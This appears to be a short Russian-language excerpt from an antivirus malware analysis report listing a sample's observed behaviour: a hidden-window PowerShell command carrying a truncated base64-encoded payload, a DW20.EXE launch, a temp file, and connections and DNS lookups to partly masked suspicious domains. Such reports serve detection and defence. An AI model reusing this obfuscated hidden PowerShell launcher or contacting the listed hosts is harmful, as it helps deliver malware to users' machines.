Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAGkAbAB1AHkAdwB1AGMAdAB4AGUAPQAnAE8AegByAHIAbwBpAGsAZgBjACcAOwAkAEoAZQBmAHQAbABiAHMAbgBtAHEAYQBrACAAPQAgACcANwA5ADgAJwA7ACQARAB5AG8AdwB1AGkAbQBiAGgAZgA9ACcAVQBiAHAAeQBoAGsAaQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1424
- %TEMP%\1048373.cvr
- 'ko###kweb.com':443
- 'di####ybepviet.com':80
- 'ko###kweb.com':443
- DNS ASK my###msylic.com
- DNS ASK ex####ivehhitz.com
- DNS ASK ko###kweb.com
- DNS ASK di####ybepviet.com
- DNS ASK la#####copysales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAGkAbAB1AHkAdwB1AGMAdAB4AGUAPQAnAE8AegByAHIAbwBpAGsAZgBjACcAOwAkAEoAZQBmAHQAbABiAHMAbgBtAHEAYQBrACAAPQAgACcANwA5ADgAJwA7ACQARAB5AG8AdwB1AGkAbQBiAGgAZgA9ACcAVQBiAHAAeQBoAGsAaQB... (со скрытым окном)